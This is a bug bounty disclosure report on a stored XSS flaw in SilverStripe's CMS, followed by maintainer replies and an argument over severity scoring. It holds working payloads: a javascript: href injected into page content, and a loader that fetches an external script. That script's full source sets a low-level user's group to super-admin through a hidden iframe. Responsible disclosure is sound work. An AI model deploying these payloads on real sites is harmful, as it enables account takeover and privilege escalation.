Stored xss bug to hijack admin account in silverstripe/silverstripe-framework
Reported on
Mar 27th 2022
Description
Using this xss lower level user can change his role to super-admin and can hijack admin account
Proof of Concept
1. First from super-admin account goto http://localhost/silverstripe/admin/security/#Root_Users and add user-B as content authors .
also give user-B only permisssion to page section .
2. Now from user-B account goto any page and edit it http://localhost/silverstripe/admin/pages/edit/show/7.
after edit save it and bellow request is sent to server
POST /silverstripe/admin/pages/edit/EditForm/7/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Pjax: CurrentForm,Breadcrumbs
X-Requested-With: XMLHttpRequest
Content-Length: 1967
Origin: http://localhost
Connection: close
Referer: http://localhost/silverstripe/admin/pages/edit/show/7
Cookie:
Title=admin-pageNew+Page&URLSegment=admin-pagenew-page&MenuTitle=admin-pageNew+Page&Content=%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E&MetaDescription=&ExtraMeta=&ClassName=Page&ParentID=0&SecurityID=5aa9e58c341853a9f4b5320d938debaf514a8b50&ID=7&AbsoluteLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F&LiveLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DLive&StageLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DStage&ArchiveWarningMessage=Warning%3A+This+page+and+all+of+its+child+pages+will+be+unpublished+before+being+sent+to+the+archive.%5Cn%5CnAre+you+sure+you+want+to+proceed%3F&TreeTitle=%3Cspan+class%3D%22jstree-pageicon+page-icon+font-icon-page+class-Page%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22item%22+data-allowedchildren%3D%22%5B%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-page%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CErrorPage%5C%5CErrorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BError+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-error%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CRedirectorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BRedirector+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-redirect%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CVirtualPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BVirtual+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-virtual%26quot%3B%7D%5D%22%3Eadmin-pageNew+Page%3C%2Fspan%3E&Action=split&action_save=1&BackURL=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin%2Fpages%2Fedit%2Fshow%2F7
here in this request put xss payload %3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E& in Content parameter .
If you decode this then you get <p><a title="jhkh" href="javascript:alert(document.domain)">sd</a></p>
here javascript code javascript:alert(document.domain) is provided .
3. Now goto admin account and open the above page http://localhost/silverstripe/admin-pagenew-page?stage=Stage and click the link in this page and see xss is executed
EXPLOIT
- tested browser is chrome in linux .
*Admin is loggen in into his account \ - silverstripe installation at http://localhost/silverstripe
Lets attacker is user-B and he want to change his role from "Content authors" to super-admin using this xsss.
So, user-B now use bellow xss payload in above Content parameter
%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:var+a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E
if you decode this payload then you get
<p><a title="jhkh" href="javascript:var a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)">sd</a></p>
flow
1. user-B(attacker) provided above xss payload in page content .
2. admin open the page and click the link then javascript code will be executed .
3. a new javascript will be downloaded from http://localhost/silver.js and it will execute .
5. now malicious javascript code will send a post request to POST /silverstripe/admin/pages/edit/EditForm/1/ to chnage user-B(attacker) role super-admin from "content authors".
now user-B become super-admin
content of malicious javascript
function prepareFrame() {
var ifrm = document.createElement("iframe");
ifrm.setAttribute("src", "http://localhost/silverstripe/admin/security/EditForm/field/Members/item/2/edit"); //attacker load form into hidden iframe to change the role
ifrm.style.width = "0";
ifrm.style.height = "0";
ifrm.setAttribute("id","hack");
document.body.appendChild(ifrm);
}
prepareFrame();
myTimeout = setTimeout(fireing, 6000);
function fireing() {
document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_DirectGroups").value=2; //change group to super-admin
document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_action_doSave").click(); //submit the form
}
VIDEO POC
https://drive.google.com/file/d/1BXa-h79YgaF4hSdHyOd2kiyBn16rO9Xv/view?usp=sharing
Impact
Using this xsss "content author" can execute any javascript code in admin account . So, "Content authors" can change his role to super-admin using this xss
Thanks, we replicated this issue at our end. It's a general issue where javascript: in href attributes are not removed server side
Could you please confirm if you'd liked to be acknowledged in the official disclosure? Would crediting you as follows be OK?
ranjit-git via huntr.dev
Regards Steve Boyd Silverstripe Product Developer
It is a valid issue.
It is not fixed though, and we do not have an ETA yet.
Regards Steve Boyd Silverstripe Product Developer
@maintainer - thanks for the heads up 👍
You can go ahead and mark it as valid using the drop-down below when you are ready. A CVE will not be assigned and the report will remain private.
Only once the fix has been confirmed against the report will it go public :)
@maintainer i have shown you how attacker can become super-admin using this xsss bug and then lower level user can perform any activity as super-admin. i have escalated to maximum severity here .I think severity should be high . here is cvss score https://ibb.co/n69gDmZ https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H&version=3.1 can you plz tell me how you calculated cvsss score?
Attack-vector --> Network
Attack-complexcity --> Low
Privileges Required --> Low --> low level privileged requeired
User Interaction --> Required --> because user has to click attacker payload
Scope-->Changed --> because scope is changed to super-admin from lower level user
Confidentiality Impact --> High --> because attacker get all confidentiality of information
Integrity Impact --> High --> because attacker can perform any activity as super-admin
Availability Impact --> High --> because all information is available to attacker
@admin can you look into the cvss score here ? I could have submit this report with just as "xss bug" nothing fancy more and this will easily fall under medium severity . But huntr now look for severity based report and based on that bounty is calculated . So, i escalated it to maximum impact that attacker can perform . using this bug attacker escalated himself to super-admin and fully hijack the account of existing super-admin . After become super-admin attacker has full control over the dashboard .
Hi Ranjit, given the report content, the maintainer has defined the severity of this security issue. We (huntr) don't influence the severity of reports as the maintainers know their project best.
@admin Then there is no need to severity based report. Why the extra work to show the severity of bug if it does not considered.
Hi Ranjit. Let's please stay on topic. If you have no other questions regarding this specific report, then let's take the conversation offline so as to not spam this channel.